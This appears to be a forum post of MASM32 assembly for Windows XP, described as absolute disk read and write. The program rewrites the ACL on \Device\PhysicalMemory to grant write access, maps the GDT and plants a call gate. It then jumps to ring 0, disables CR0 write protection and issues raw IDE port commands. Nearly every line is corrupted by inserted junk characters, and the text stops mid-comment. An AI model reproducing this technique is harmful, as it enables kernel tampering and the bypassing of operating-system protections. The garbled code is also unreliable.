|
|
我可没这个水平
" |/ D- B: O8 Z.686p& ^+ z4 {$ J ?2 n
.model flat, stdcall% I8 ]0 S0 v% j8 B( k& F
option casemap :none ; case sensitive
1 u" n$ s4 d6 O7 j7 E% ] Q; ######################################################################### I4 p- q* ^& L" e6 }" X, m
include \masm32\include\windows.inc
; R. p5 S+ F# a7 }. K0 _- hinclude \masm32\include\user32.inc5 Q" q: z3 A7 n
include \masm32\include\kernel32.inc4 H* j# L! C1 M$ o* g/ V: k0 L# e3 V- o
include \masm32\include\advapi32.inc
3 P. I. r7 k( v' t
: j& g" C8 \) Y( {0 iincludelib \masm32\lib\user32.lib
: d$ T5 U `- ]5 Lincludelib \masm32\lib\kernel32.lib
$ m Y) L N! k8 n$ y% u- t5 jincludelib \masm32\lib\advapi32.lib/ T6 ]8 @+ h# w0 V9 d! g
DEBUG = TRUE3 [ l4 p$ t T E
6 D9 p9 I& e4 G* P0 Z% X5 eHMODULE typedef dword1 b. k0 A9 S1 {1 }% J8 _
NTSTATUS typedef dword3 d6 }- q9 E+ z6 ]
PACL typedef dword* H, P2 s ?) u2 J' h' G8 x
PSECURITY_DESCRIPTOR typedef dword7 \. `2 G: Z2 i4 k7 f" _! R8 A% F
0 _- ?2 V3 S! {+ L# zOBJ_INHERIT=2 $ L$ D3 u7 v/ o" R3 t e
OBJ_PERMANENT=10h; C' R4 @4 N( `6 }8 g+ G
OBJ_EXCLUSIVE=20h . x9 |: j( p# s0 V0 h- M
OBJ_CASE_INSENSITIVE=40h
0 D9 r* p _' i/ ]0 ^) Y% x- ^OBJ_OPENIF=80h
( b) w6 j+ J& k! y6 o" x, f9 SOBJ_OPENLINK =100h
" z7 _5 @' r- W L- j# t. pOBJ_KERNEL_HANDLE=200 1 `0 S4 ?6 ^2 g# V/ E) h8 V2 J
OBJ_VALID_ATTRIBUTES=3F2h 6 ?: x" ^/ b3 r7 O1 Z9 d
* ^. d8 J1 K" A% C# E
SE_KERNEL_OBJECT = 6) c& y; X; f& F7 x( }" _/ j* @
GRANT_ACCESS =1
5 u2 Q2 A- W# T5 Y) d! b" |NO_INHERITANCE =0
7 M N; _4 T( d& t* F. ~TRUSTEE_IS_NAME=1
3 C: l+ e& ]2 }2 ^% ETRUSTEE_IS_USER=1$ n& m( V7 i3 i4 ^. A" ]
STATUS_SUCCESS =0
6 p8 F/ f4 [4 v. O) F: P0 Q5 V7 f; PSTATUS_ACCESS_DENIED =0C0000022h- l& t w" u) k6 R
- u; l! ~" t2 u' @
STATUS_ACCESS_VIOLATION equ 0C0000005h
+ p4 n; D! ~6 I' `; MSTATUS_INFO_LENGTH_MISMATCH equ 0C0000004h
6 d3 z7 W' e+ R: y" @* \9 HSystemModuleInformation equ 11
' ^: N1 L; g4 Y" g4 ?9 RPVOID TYPEDEF DWORD
: k/ z: B3 B3 x' EUNLONG TYPEDEF DWORD
" ~" o& |, ~) d3 b, {9 sCHAR TYPEDEF BYTE
# _: K( @- \. {* X7 e1 x# r: Z
3 V, ]% B w& c* E/ KUNICODE_STRING struct
6 ?' s- X0 [# ?5 f# M8 h3 L nLength word ? ; ?( V- c# H* N: v2 r& u
MaximumLength word ? 6 \ z+ v, N+ ]' H
Buffer dword ? " O5 E( K8 y' h" s4 C [
UNICODE_STRING ends, R+ Y7 n- i# `; G6 W8 P+ X4 F
1 \) N% u/ p& f' qOBJECT_ATTRIBUTES struct j9 ^* @9 o. k8 D7 e) N
nLength dword ?
* _9 w& n9 s8 ~* p- O' q RootDirectory HANDLE ? # R1 [! S V J# O% Y6 G9 `
ObjectName dword ? UNICODE_STRING
4 d9 u. i: r/ v1 S6 B/ F# U Attributes dword ?; + ^! E: }# O; ^( W+ l
SecurityDescriptor dword ?; PVOID // Points to type SECURITY_DESCRIPTOR
7 n$ h" u {# H8 q5 z. \' { SecurityQualityOfService dword ?VOID // Points to type SECURITY_QUALITY_OF_SERVICE % M* H8 V0 P0 B, G7 `& l, ?/ M- @
OBJECT_ATTRIBUTES ends / @+ x" F1 A( H* E
2 f' p( Z+ o: Q- _
8 r/ h5 k' q' L! ]7 CTRUSTEE struct 7 r7 w( @/ l7 @
pMultipleTrustee dword ?TRUSTEE - K# r9 B3 ^* s% v9 p3 Z( e, M
MultipleTrusteeOperation dword ?; MULTIPLE_TRUSTEE_OPERATION % c% }3 [! E3 d% d' _5 \
TrusteeForm dword ?;TRUSTEE_FORM
/ i8 k3 Q( T, \( G& | TrusteeType dword ?;TRUSTEE_TYPE ) e9 o# W3 w7 _/ x, b O
ptstrName dword ?;LPTSTR - c$ c Q: M( l7 z" t. L( e) ?
TRUSTEE ends0 n* X5 ]' p& j X( ?
! A; ~9 h. j- m" X. k; x
/ `1 h# W5 X5 N. n8 P3 t5 q
EXPLICIT_ACCESS struct
2 p) x4 V9 `1 ?9 b grfAccessPermissions DWORD ? . S' f( {- L3 I' V3 }8 ^
grfAccessMode dword ? ;ACCESS_MODE
6 E5 j" S/ L. d* `+ _1 t( s: u grfInheritance DWORD ? ;
$ i) W) N3 F4 }5 c f5 s. Z( G" ^ Trustee TRUSTEE <> ;" L, y4 K7 A8 P, u$ o' V6 u
EXPLICIT_ACCESS ends/ k# s' d+ N# p/ q
, w3 Y# N7 p/ Z! o2 U$ H
MyGATE struct ;门结构类型定义
. `/ V$ N: i2 O* ^9 y4 ?, ~0 F6 H OFFSETL WORD ? ;32位偏移的低16位0 e, P, T! Y' X1 I* i$ m. @! U
SELECTOR WORd ? ;选择子* {+ G# {6 o8 P* _ _7 }' g/ D
DCOUNT BYTE ? ;双字计数字段
3 r1 N- ^8 `6 v3 \. w1 T GTYPE BYTE ? ;类型
- g( Z/ A5 d5 J3 n( }1 x OFFSETH WORD ? ;32位偏移的高16位
+ W9 A9 @# Q! a6 W2 ~' z; WMyGATE ends: B. W. g* g7 c$ W0 C
' _1 C5 b5 c/ P' ZIDEINFO struct
3 O$ x( R% T( wwGenConfig dw ?
. L. q" Q5 o- C8 A- ^/ O1 A! z+ ]wNumCyls dw ?;拄面数
' [+ j# B* ^9 _. I% ~, }3 AwReserved dw ?
; `( y v$ D+ b. t! `) }! ]wNumHeads dw ?;磁头数
3 u" J& O- q% z) y2 Q rwBytesPerTrack dw ?;每道字节数, f5 `& y7 |- a( W; l+ O
wBytesPerSector dw ?;每扇区字节数) T0 O* o3 y, @+ j- v; Y1 y4 L
wSectorsPerTrack dw ?;每道山区数
6 c5 \8 I* L: Z+ Y- S( r6 l, J3 ewVendorUnique dw 3 dup (?)
; ?2 I- E4 ~8 b6 FsSerialNumber db 20 dup (?);硬盘序列号
; g. B3 T- E! t+ j, j f4 e+ WwBufferType dw ?;& ?8 _; Y5 b8 T. r; n- U5 D
wBufferSize dw ?; ;n * 512
( d$ |0 ]/ e9 [5 A, ]7 U3 zwECCSize dw ?+ o" _$ U9 q# q" }+ R5 Q' Q& _
sFirmwareRev db 8 dup (?);2 S0 N* J$ [- [& u o3 n
sModelNumber db 40 dup (?)2 H, e. ^, g# J+ h1 I& k
wMoreVendorUnique dw ?
" o$ W# h- a9 i+ z: r4 c2 mwDoubleWordIO dw ?
) [5 b- J# }! [4 mwCapabilities dw ?( J, u; `) C3 ~, d: S: n- b3 k
wReserved1 dw ?5 J8 k6 u/ G5 ?; y
wPIOTiming dw ?;* q1 K3 l5 M8 e. Z' @/ r4 H A
wDMATiming dw ?;
0 q# j. ~: E7 \, E' R+ d8 EwBS dw ?
0 H! u, ` ^- s1 r' U7 n$ Z/ D) o; LwNumCurrentCyls dw ?;
t* E2 K8 Y+ E% h- cwNumCurrentHeads dw ?;
9 h; W" P8 ?+ b; x" UwNumCurrentSectorsPerTrack dw ?;
8 I( D6 C* p( H/ F G1 U' AdwCurrentSectorCapacity dd ?;
; }) U: O* C3 G' s I- y- B7 swMultSectorStuff dw ?;
6 }: g, f7 ^1 A+ OdwTotalAddressableSectors dd ?;
* j( Y0 B# y+ {( W! ZwSingleWordDMA dw ?;
9 q" A8 s5 ]& F2 BwMultiWordDMA dw ?;8 N; F8 G' s5 j
bReserved db 128 dup (?)
5 r# B/ T$ {9 p UIDEINFO ends
% m" m' H$ k. j& }, Y- |1 }0 p. ^5 S; ~! ^2 ^ G5 G& T9 y0 W7 W
4 p1 T5 f" A( \# L* d& e! H1 y: RSetPhyscialMemorySectionCanBeWrited proto :dword' v6 z' x- ~. ~4 f
MiniMmGetPhysicalAddress proto :dword. w: f) L! `/ X- Q
& r. o8 u% S0 x- X7 _8 iENTERRING0 macro: |% d: v. f |: s. H) ?' q2 x
pushad
! b1 E+ X' g+ W2 J" ^* D" K* Zpushfd
. q; W3 o1 |1 h/ ?& d3 ]cli
: \+ } ^' t6 Amov eax,cr0 ;get rid off readonly protect
! b# ^0 W3 L9 Yand eax,0fffeffffh
' E& F; s' l: G0 m3 J5 Cmov cr0,eax' J1 E. m- d& Q" H) N7 ^
endm
3 l% q: W' q, o1 D H, T
) m) r- C1 y1 E: k. ?3 LLEAVERING0 macro
3 F* t" s6 U4 }. e2 `4 n% amov eax,cr0 ;restore readonly protect8 C1 s, O% ^$ x+ f4 A" V9 ^; x
or eax,10000h
5 ^1 U0 A3 [ K% V; L/ jmov cr0,eax! q7 [$ w- s+ w
sti
0 |+ d; ~- x7 V( |3 R) e$ ~" M& Vpopfd / d# @# K8 }5 t: b
popad
6 Z) Y9 Z& M q4 @ ~$ ?$ \3 b) Nretf S2 M* \5 {2 j* H8 v) g) j
endm _7 f1 p9 h/ f# z' C4 x" d+ G+ D
: J- ^3 T0 N4 Z7 N$ |' K6 l
' X. K% _; V8 L5 [$ B, I4 C4 [UNICODE_STR macro str, V5 `: L' k2 }% D8 e! R8 C* r* Q
irpc _c,<str>6 Z9 {) ~+ D3 d% l) k9 V" J' [
db '&_c' l2 V4 V+ Q d3 }
db 02 ~$ N6 ^$ o! U' J1 ~
endm
) \, O# }* ]4 ?2 C3 I1 `8 uendm
$ v4 n9 X5 t+ t2 _: Y1 P. P
+ v8 f7 V( [/ T.data?
* C/ y$ f& R: a C3 zGdtLimit dw ?: ^/ l) _6 h) J5 a' K" g
GdtAddr dd ?
9 t& e% r" i$ ]4 }6 _* o: O. G( h! Y- c: E7 P R3 r+ c; p
mapAddr dd ?8 ]7 ]* W% ~4 ~( O8 p
OldEsp dd ?
3 n; ~8 ]6 B, H4 w x9 E3 _
- m: d9 T0 _9 O: O4 Q/ areaded dw ?! e0 b- W/ Q( P/ C. r3 K6 c9 I
buffer db 512 dup(?)- z; x. Q- Y' b8 X9 u9 A+ {. U
ShowText db 512*3 dup (?)) Q G _: K/ \& c- Q! H
/ d$ I1 @' a6 Z* g) M+ u
szBuffer db 1024 dup (?)9 z& a- J- H! @$ C9 \
szModelNumber db 41 dup (?)
8 X6 j+ B4 `7 SszSerialNumber db 21 dup (?)6 C; U+ F6 w1 [1 ?; d
szFirmwareRev db 9 dup (?)
$ u: O9 o, k( \4 \5 M8 r3 _2 M5 N V7 h% W7 c0 h0 u4 r
stIDEINFO IDEINFO : n& a( J! x/ ]$ {9 X0 q4 W
* m. [- _0 c" w" l! ~+ _.data+ s1 @( y: t7 I3 G3 g% Y
align 42 P" T) [9 s% d% j
objname dw objnamestr_size,objnamestr_size+2
$ P! {* b: |! @; w' qobjnameptr dd 06 L% w! `: N+ \7 S
objnamestr equ this byte- K2 f" H/ j3 u
UNICODE_STR <\Device\PhysicalMemory>$ L& K8 J6 P% A" H1 X
objnamestr_size equ $-objnamestr7 M& s1 O, \( }! k
3 x0 f& v0 m; `6 o( Y- d0 aszTitle db 'IDE 硬盘信息',0
0 a& k9 z9 m! i; NszErrInfo db '无法读取硬盘信息',0
& w8 Z/ G. @9 ^1 s9 \ KszIDEInfo db '柱面数 : %d',0dh,0ah0 g7 Q" l2 g* @4 f3 Y/ G9 o* F7 U' @+ E- ^ m
db '磁头数 : %d',0dh,0ah% T+ u# `# J- P2 k2 E' _5 N) }
db '每道扇区数 : %d',0dh,0ah8 r! N2 V# ]) h: U
db '缓冲大小 : %d 扇区',0dh,0ah4 k. I) r( m% W/ z4 `9 J$ X6 q4 J. m5 a
db '硬盘型号 : %40s',0dh,0ah
- L/ U* N& a) L& B6 w4 f# z db '序列号 : %20s',0dh,0ah
/ ] L% ?) f5 B( |, x) P: E, m: v8 k db '版本号 : %8s',0
5 }% B4 ~& E( N; O$ F5 M
- p8 H- ?1 @: p. {$ a1 r2 [align 4
+ b% x: x) j/ v: s- k/ pObjAttr db 24 dup (0)6 O. U' `# n5 L! M$ b# f. U, h
9 V% L Z8 R9 S# `7 o) B) p4 h' ?( t
Callgt dq 0 ;call gate's sel ff2 C1 H& H1 ?; s) Q+ ?
Caption db 'Windows XP绝对磁盘读写',0/ H/ y# v W5 C7 n
Digit db '0123456789ABCDEF',0 {; e% l2 w, W" U1 ^ Z
.code. m; x' e; y F& J
_ShowBuffer proc ;显示所读出的信息+ o$ k1 G+ \, N. w2 a8 Q( I: d7 O
;把数据转换成16进制的形式* z1 u8 P' H! D5 A; z' E9 ?
mov [readed],512$ ]# P% j# T) s+ `7 C v2 |
mov esi,offset buffer ;数据
. F, q1 n$ a9 X9 g9 ] mov edi,offset ShowText ;转换后的数据
: R: ]. ?$ Q0 }8 S/ h mov ebx,offset Digit
0 N( X/ W T7 H5 K& Y- T xor ecx,ecx
0 P# r7 ~8 ?" E! ^( J) x xor eax,eax
& y1 Y3 ]7 _+ ^% Z' y8 vcomputeAgain:
, v. t$ ~; m3 y i cmp [readed],06 u* |4 X9 |- ~! l" ^+ ], q6 p6 l
jz endCompute8 S/ Q" F0 O. P; C3 V
dec [readed]
( u" k/ x% s7 H( A. D: S/ B lodsb) }; R) J4 C; p7 d
push eax
3 Z* w9 w+ K0 K& J' C# w. W shr eax,4 ;高4位
. R6 b) G, c( n xlatb
" v% b2 y1 R! g stosb
3 h8 m3 T) G& }+ Z- x' b* n pop eax
' J0 f. F9 B* [; S6 H( Z and eax,0fH ;低4位. `; e! U7 y" M: `
xlatb
6 ]/ a/ ]7 W' c U& i( @ stosb6 k% n4 g1 f w4 Y; B0 Q
mov byte ptr[edi],' ' ;空格% x& [7 p4 r' E, m
inc edi* v$ z7 W$ L/ S; b9 d( j& S
inc ecx6 R# p3 O# ?9 @% I# h
cmp ecx,16" X4 I- w% F: `7 b
jnz computeAgain/ m+ F& q2 X9 L
xor ecx,ecx
6 T) T$ b% s. f2 V. G; K mov byte ptr[edi-1],13 ;回车
' o3 e0 o# e9 C1 K jmp computeAgain8 z' N# }/ X0 {; d$ {1 {- i
endCompute:
/ T r$ m* u% ~5 \$ f" ]' B ;显示' B |8 t& G( z9 t3 b1 N; ? \
invoke MessageBoxA,NULL,offset ShowText,offset Caption,MB_OK
) S! i ^" o# V0 ]; T ret3 H* Q3 p- K" K8 b
_ShowBuffer endp
/ J0 f. C; [5 Y [+ w2 q# ~
! l2 V ?" _2 Z, q0 }+ z! L. iSetPhyscialMemorySectionCanBeWrited proc uses ebx esi edi hSection:HANDLE 8 k0 x* F# W+ z0 s& G, r+ f
local pDacl: PACL + c+ ?& B" @: |8 v( A
local pNewDacl ACL ; o/ K5 W; X# i5 ], m
local pSD SECURITY_DESCRIPTOR 3 v6 L1 j% d2 G3 G5 M
local dwRes:DWORD ;2 T" u: [0 }5 _$ w; G' ?- u" I
local ea:EXPLICIT_ACCESS ;
6 ]' _$ ]& N4 S# B5 Q, [% Binvoke GetSecurityInfo,hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, NULL,NULL, addr pDacl,NULL, addr pSD
5 a( L3 F/ d: `! fcmp eax,ERROR_SUCCESS E* F+ f' D e6 V9 ?& u
jz @f L5 B* \, q& M+ p+ N, F
jmp OutSet
! N! v- G, B8 a7 t@@:
" Y+ P. U' K. X4 Z( Qmov dwRes,eax( _9 ~, M; j5 j. V u( s; K
mov ea.grfAccessPermissions ,SECTION_MAP_WRITE;2& g( u- v/ w1 C$ {
mov ea.grfAccessMode ,GRANT_ACCESS;1! U% N7 R" T2 ^# v" w
mov ea.grfInheritance,NO_INHERITANCE;01 C- c( r; h" X$ s: N
mov ea.Trustee.pMultipleTrustee,0
$ h4 p" X: d& ?0 umov ea.Trustee.MultipleTrusteeOperation,0
: a, F' n6 x" s/ q c! Rmov ea.Trustee.TrusteeForm,TRUSTEE_IS_NAME;18 @/ I' S' t9 k! Y; L- u
mov ea.Trustee.TrusteeType,TRUSTEE_IS_USER;1+ U0 ~( f5 ?$ F
call @f6 |; Y) o/ T7 a, x# Q. S/ `
db "CURRENT_USER",0
% f/ Q {2 F/ v: d3 E6 A@@:. v' B- Z% d/ o6 q
pop edx( \. W. c+ i! c2 U, d/ |
mov ea.Trustee.ptstrName,edx0 d2 o8 e7 Z2 E( E+ {4 |% i
invoke SetEntriesInAcl,1,addr ea,pDacl,addr pNewDacl
+ L& l3 \, W& p0 b4 Z4 ?; ~0 Hcmp eax,ERROR_SUCCESS
_: T) z/ p1 T6 D. D& B8 x% yjz @f
( \) `! _- i+ N3 A3 Mjmp OutSet8 U. W5 L+ ]& |
@@:
* k5 \1 ~& t; l3 g7 i4 P3 Pinvoke SetSecurityInfo,hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, NULL,NULL,pNewDacl,NULL5 V3 z6 j% A! d. D! b% @
OutSet:
3 ]( Z6 \9 n L" x4 V0 Lcmp pSD,0
E; y3 `. o% \) p6 j( M+ n5 {0 sjz @f! f5 B. z5 P' _6 a1 J. P! m
invoke LocalFree,pSD
! M" Q; l' g( A" F@@:/ h) X {3 t( i, x* _
cmp pNewDacl,0
6 E1 V. N/ f; h. l+ X9 K6 ~; A+ _jz @f
0 O/ b! M4 W) f) V4 u9 d, Iinvoke LocalFree,pNewDacl- q* m2 M7 R* A' j0 O# c! U+ }' V
@@:
$ Y, M, K$ h$ O) @. t8 Tret0 m( V: O% A8 v$ a" W
SetPhyscialMemorySectionCanBeWrited endp
# L; k: k- e- D0 h
# C% Z2 S9 m: k6 S$ M _% jMiniMmGetPhysicalAddress proc virtualaddress:dword3 X4 X3 ^& E+ y& |
mov eax,virtualaddress4 m- q" t: n2 `: n( f$ J
cmp eax,80000000h
$ }/ ?; \& u- n, _ jb @f0 j, H; ~/ ~2 T
cmp eax,0a0000000h, h# Z y$ i7 X
jae @f
5 `1 v: J! w# }5 U h and eax,1FFFF000h
! D+ L J0 t1 ~/ q% A ret
$ m3 D; B* w0 G$ I @@:
% l$ w6 x9 v, ]" X4 z! r. A mov eax,0
' F0 z2 }) f) u# d. C& s ret% ~0 x9 Q( `; U
MiniMmGetPhysicalAddress endp3 _: K) m" J/ ~! ^" ]$ ?5 ?9 T
7 O, K+ K4 R8 f8 H3 S: M2 \- z
ExecRing0Proc proc
; e7 h- C6 v% D M. \local tmpSel:dword
" @) t# i6 k. R5 T+ o' Llocal setcg:dword1 C% d3 G/ z) l8 r9 v
local BaseAddress:dword
. ]& ~: K: q' \4 j- u0 o( H' [2 T i! w Llocal NtdllMod :dword
3 k1 `$ M: k/ dlocal hSection:HANDLE
- S% a- D t$ j# A7 r+ ~local status:NTSTATUS: j8 z3 z) E. @* u& A3 x
local objectAttributes:OBJECT_ATTRIBUTES / M% I6 a# e2 F3 l6 h' Y/ U4 C T
local objName:UNICODE_STRING
" U! G- N( o1 m/ _9 dmov status,STATUS_SUCCESS; 2 z* _( P" J# L
sgdt GdtLimit
+ w5 ^1 l5 {0 O& finvoke MiniMmGetPhysicalAddress,GdtAddr3 C- b3 a; N, h& ~8 A1 P& Z. l
mov mapAddr,eax
& L( D3 Z C+ o ktest eax,eax) j% w) x2 O. ^4 N( v$ K7 t
jz Exit1) F( s0 O. ~1 k4 d& x! W, p
call @f
* G, b$ ~6 Y( j, `2 ^, ~9 Gdb "Ntdll.dll",0$ }4 b! b @% g7 C
@@: Q( {% l7 M }/ X
call LoadLibraryA4 C) \$ S6 B3 ~
mov NtdllMod,eax0 P+ L; I$ q+ t/ ]% M4 ?! r
4 x% t. C' T J6 o: {lea edx,objnamestr) Z0 o' a* q( C" A
mov objnameptr,edx
% a$ M; O" c. Y5 olea edi,ObjAttr
# m, ]2 ^# f/ d4 _( {% @5 U) F1 }and di,0fffch ;align to 4 bytes,or ZwOpenSection will fail& \8 P! S* Q+ w4 u5 p
push edi ;edi->ObjAttr/ v7 ?: y- I4 e& E% u1 u. @% ~
push 24 ;length of <\Device\PhysicalMemory>
) @* c3 m& B; S" Ppop ecx
4 o% n" W: Y) [; G5 Fpush ecx2 U4 W( C: z8 Q- m$ e: [3 N
xor eax,eax
) m: {) T1 R- Y5 D$ Irep stosb ;put ObjAttr with 0
0 w/ {3 \& c+ a8 b) Dpop ecx
) i. L" ~; b* b& o" n+ Opop edi7 E, C. n. f. r' U. `
mov esi,edi
2 H) t4 p ~+ z' R# {7 a+ o. U& qstosd
- A' O( X; s9 S, }8 m* ^7 ~mov dword ptr[esi],ecx
* L! L. m8 u: m8 [$ v0 d Istosd
3 q- u8 V1 o; plea eax,[edx-8] ;eax->objname% k) k5 K5 R) D; X1 L6 V2 k
stosd ;ObjAddr(18h,00,00,00,00,00,00,00,offset objname,40,02,00,00,dd 2 dup(0)
: X3 I* w; }. _ i" nmov dword ptr [edi],240h3 M- U) z0 q* |+ m5 a3 z+ K2 ? ?
1 b$ _+ |- Q& `0 Rcall @f
9 U0 t0 [/ f w4 Rdb "ZwOpenSection",0
* L. p0 q3 k8 V1 V@@:
- S1 Y, e0 _3 o8 Spush NtdllMod+ h4 n+ V+ p" g% u
call GetProcAddress6 s, b" g$ d3 Z! ?. r
mov ebx,eax ;ebx=ZwOpenSection. J4 b% u# v: O8 h
9 X- D+ @4 A8 V- L. w- g/ ^
push esi ;esi->ObjAttr
' Z5 Y+ X/ V# \" H a' `push SECTION_MAP_READ or SECTION_MAP_WRITE
O: ]5 a6 W) ]/ w, z Ulea edi,hSection
" d- Z, B; P$ Z! epush edi ;edi->hSection$ x* C' f- G/ {
call eax ;ZwOpenSection(&hSection,SECTION_MAP_READ or SECTION_MAP_WRITE,ObjAttr)
+ T3 P- W5 H* \8 v4 [
+ _( p& m8 \. g, ~9 z% t/ kmov status,eax" Y9 B( [$ K; E9 a/ ~+ z5 G& z+ a
cmp status,STATUS_ACCESS_DENIED
/ F9 v0 k/ d$ ^jnz AccessPermit; |# b4 F& H; g6 j) N' K# W
mov eax,ebx
) k2 Y6 u% S, y" R" l
( g, y8 D$ H. R8 `6 Tpush esi . w0 `( B- B/ ?0 R9 _
push READ_CONTROL or WRITE_DAC 0 {$ T/ \2 m/ c8 O0 [
push edi
; s" u; j& ^7 {call eax
1 `4 d. Y0 Y3 m; ~
/ v6 X9 {' U+ A6 C) {( y2 w1 ymov status,eax
6 ?9 v2 {7 v8 `4 A4 k9 d5 s. H( Sinvoke SetPhyscialMemorySectionCanBeWrited,hSection
8 ~, f) V$ i% h. w$ ]) ^6 V3 h( w x+ T4 b' y9 Z
call @f
: z, `& r. e( B) B# d2 O3 @; y* n2 Rdb "ZwClose",09 h$ n( f, P! H! a& ]/ _
@@:7 A- l* W9 ^: U
push NtdllMod
: u; q$ P9 _& e( k x3 h$ D5 }call GetProcAddress
. p* k3 M4 {. T; L+ f" C W! @
: G: W3 q4 v2 L& f1 @$ x: Bpush hSection0 g6 W7 O7 b: R
call eax ;zwClose hSection
! p8 U" ?6 y5 a: M' i7 u- p$ ~
/ Q( \& n- m/ X2 O" S' K% ~3 N5 y8 Kmov eax,ebx# v7 e$ Y, U. Z- y- _* z
9 c$ \3 w) K0 U: m( ?( S. I
push esi
# C; v' ?/ I# |& Apush SECTION_MAP_READ or SECTION_MAP_WRITE 0 W& e. R" _! \- k" Z- [' X5 S( L8 K1 e
lea edi,hSection" j8 U1 T: t# p4 ]2 X
push edi
1 P. v8 ^& V) }1 ccall eax
! B! I: p' P: n, ~0 R5 d% j) Qmov status ,eax! W5 @) J6 o, ]1 J( B; i
;status =ZwOpenSection(&hSection,SECTION_MAP_WRITE|SECTION_MAP_WRITE,&objectAttributes); $ e( Y7 h$ J9 ]% B6 f8 k
AccessPermit:& x9 S J) ^5 {, w, ]
cmp status ,STATUS_SUCCESS
- Z2 S: _( D# z0 ?9 Fjz @f) V0 K# J8 ~+ _2 z) D; G k8 p* Z
;printf("Error Open PhysicalMemory Section Object,Status:%08X\n",status);
* }8 u1 a! ~! Z9 ~+ j ]! b- F% @$ G;return 0;
' H0 R4 F9 Z4 y& A( N7 [1 amov eax,0
{ ~+ i+ w5 X; ?: W' p Dret8 W. v5 `& y( t. H
@@: ( ?3 e- K: F& t+ T0 K) @
movzx eax,word ptr[GdtLimit]2 ^3 V: Q' x; z% }9 T0 }
inc eax
% p* I8 d! z6 O/ }) V3 W1 Uinvoke MapViewOfFile,hSection, FILE_MAP_READ or FILE_MAP_WRITE, 0, mapAddr, eax
: v& T4 g/ n5 t$ Omov BaseAddress,eax
) R8 e ?9 ^/ }8 s4 m' I0 V$ ~9 pcmp BaseAddress,0% j4 c8 l" z: r' r
jnz @f8 o% S$ \$ C- W) n) q. q9 J
;printf("Error MapViewOffile:"); # K5 I0 x% i+ r) F1 [- T
rintWin32Error(GetLastError()); return 0; % F3 D4 Q% Q# m/ W
mov eax,0; `4 c* k- L& u3 \; r5 v
ret
5 \4 J7 `; c# ~( t1 Q0 U$ m+ e- y4 O4 {@@: 7 j& L- f! K4 t5 ?% Y# \
mov esi,eax ;esi->gdt base
- M) G; B, Y, ^8 P+ C! rmov ecx,3e0h
; m- Q3 u- G0 x; X3 X4 Umov eax,GdtAddr. V0 U2 X) `+ w" V9 v9 d
.if dword ptr [esi+ecx+2]!=0ec0003e8h* o q! E& K; @
mov byte ptr [esi],0c3h
( o2 L, S; _$ ^6 u
6 @5 v. E6 }9 ]mov word ptr [esi+ecx],ax. g5 Y0 |" K$ V: R
shr eax,16; d: P v* W1 ?' L
mov word ptr [esi+ecx+6],ax
! H. _% N1 J; T! \& Cmov dword ptr [esi+ecx+2],0ec0003e8h& T2 H. P" N7 K2 L: F5 _
0 k6 w) |+ y! \3 s( g, v0 K
mov dword ptr [esi+ecx+8],0000ffffh
8 m8 c) Y! ^* e7 @; E- H( ?- |mov dword ptr [esi+ecx+12],00cf9a00h& k& S0 P9 G9 w( m1 z8 b* i9 f& h, |
.endif3 H% s) ~9 A, f8 M2 @
{2 J" s T. ~. x8 U9 m7 B
mov setcg,TRUE
' Y9 y$ g9 k6 h# s g4 R5 l2 }cmp setcg,0
8 \9 R+ x. @# p7 f8 gjnz ChangeOK
; g8 o# m" n! A6 M! \call @f# ~( ]3 n! t( V' n, i
db "ZwClose",0
1 F$ x- C( \9 o1 Q@@:
* u6 T$ `" l" opush NtdllMod9 h4 e: I- i: x S0 k! R
call GetProcAddress9 [* ~# v# [# n
push hSection7 V# M R' k3 L' I1 w8 w9 {" B/ J! N
call eax1 {" r$ O- ?+ l, C, c- R
xor eax,eax! S2 k3 q3 N q6 A0 T
ret
3 _# i2 x# M, z7 S5 G pChangeOK:& A. Z9 Z- `; q/ |) M" U% D7 q1 U
and dword ptr Callgt,0
( L) u+ _' g5 e# o% E* E" Z' f- Yxor eax,eax
7 o: V# R v- s" }mov ax,3e0h
9 O: P; @/ }$ o5 p9 ior al,3h- ]. o/ J& t3 a! e6 V8 b9 O# ~) s/ G
mov word ptr [Callgt+4],ax + B I4 B, {) O
;farcall[2]=((short)((ULONG)cg-(ULONG)BaseAddress))|3; //Ring 3 callgate;
* Q0 y2 D' C% N# l3 U, }lea eax,_Ring0Proc3 d; D) [; |+ _
;invoke VirtualLock,eax,seglen " e$ \# U! L+ ?; q E4 \1 g
test eax,eax- z& u* p$ f1 P7 o0 B
jnz @f; i1 S# m. s9 _" e
xor eax,eax" y+ Q. M6 n$ {7 a6 B
ret1 R" a4 @- n% a6 l
@@:
f$ t- u: @4 _1 H7 o0 ^invoke GetCurrentThread
' v1 j8 n; r3 u: k1 `invoke SetThreadPriority,eax,THREAD_PRIORITY_TIME_CRITICAL
; _8 [" w7 ~5 @ Z8 \
! R' G: p, n! r4 C. B* r9 w C1 ninvoke Sleep,0
0 S+ L$ {. r- W- l4 Hcall fword ptr [Callgt] ;use callgate to Ring0!- z9 {$ f2 s5 L" Q: v+ ]/ n
;_asm call fword ptr [farcall]
, e5 \' t8 |2 S% f8 q$ |/ b" k_Ring0Proc: ; Ring0 code here..
; m/ l8 w2 ^( c/ Y" }+ \8 Wmov eax,esp ;save ring0 esp+ u2 s9 ]* |, o* ?
mov esp,[esp+4];->ring3 esp7 I- N1 U/ | [0 F G1 o$ G
push eax# Q7 ^) {3 \2 z- _- O3 M9 E
mov ebx,offset stIDEINFO- S6 R- i" N% D7 w! w9 q
assume ebx:ptr IDEINFO
; ]3 j7 f& k8 \! E4 `5 ~" J;********************************************************************
6 f0 u! V) ~ x4 n; 等待硬盘就绪
& I7 f% p( ]* s7 |2 c9 B;********************************************************************
4 I0 P7 H0 W* @1 q+ o% {) b mov ecx,10000h, i1 }+ T! y7 u
mov dx,01f7h0 ]4 X, e4 g& T* W( E" [) J0 p
@@:
3 F7 t$ Y3 P3 S& c7 V2 X( E- { in al,dx. _! v' o- r8 {
cmp al,50h
; A, Y! p7 n& N+ d jz @F2 @5 z5 `4 G. @. S' Y( j; A) K$ R
loop @B" T: |5 k1 L0 F2 z
jmp _II_TimeOut8 E! G8 @8 K' O' Z: F9 x
@@:+ |% w/ T: g; f3 Q. u3 B- C$ O
;********************************************************************( E# }& j' u" i% w
; 发送命令/ j1 u5 _" @; Z+ ~2 |
; 如果向主控制发送命令,则端口为 1f0h-1f7h
& a+ @- \4 a2 `+ N$ z) ~7 M; 如果向副控制发送命令,则端口为 170h-177h
